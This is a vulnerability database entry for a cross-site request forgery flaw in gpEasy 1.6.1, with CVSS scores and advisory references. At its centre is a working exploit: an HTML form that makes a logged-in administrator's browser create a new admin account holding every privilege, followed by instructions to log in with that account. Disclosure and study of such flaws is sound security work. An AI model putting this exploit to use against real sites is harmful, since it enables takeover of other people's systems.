gpEasy 1.6.1 cross site request forgery

2010.04.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

============================================= gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit ============================================= Author : Giuseppe 'giudinvx' D'Inverno Email : <giudinvx[at]gmail[dot]com> Date : 04-29-2010 Site : http://www.giudinvx.altervista.org/ Location : Naples, Italy -------------------------------------------------------- Application Info Site : http://www.gpeasy.com/ Version: 1.6.1 -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <html> <form method="post" action="[patth]/index.php/Admin_Users"> <input type="text" value="xxx" name="username"><br/> <input type="password" value="xxx" name="password"><br/> <input type="password" value="xxx" name="password1"><br/> <input type="text" value="xxx" name="email"><br/> <input value="Admin_Menu" type="hidden" name="grant[]"> <input value="Admin_Uploaded" type="hidden" name="grant[]"> <input value="Admin_Extra" type="hidden" name="grant[]"> <input value="Admin_Theme" type="hidden" name="grant[]"> <input value="Admin_Users" type="hidden" name="grant[]"> <input value="Admin_Configuration" type="hidden" name="grant[]"> <input value="Admin_Trash" type="hidden" name="grant[]"> <input value="Admin_Uninstall" type="hidden" name="grant[]"> <input value="Admin_Addons" type="hidden" name="grant[]"> <input value="Admin_New" type="hidden" name="grant[]"> <input value="Admin_Theme_Content" type="hidden" name="grant[]"> <input type="hidden" value="newuser" name="cmd"> <input type="submit" value="Continue" name="aaa" class="submit"> </form> </html> # Now you have an Admin user with name: xxx and password: xxx, just login page [path]/index.php/Admin

References:

http://xforce.iss.net/xforce/xfdb/58214
http://www.vupen.com/english/advisories/2010/1030
http://www.osvdb.org/64130
http://www.exploit-db.com/exploits/12441
http://secunia.com/advisories/39643
http://packetstormsecurity.org/1004-exploits/gpeasy-xsrf.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top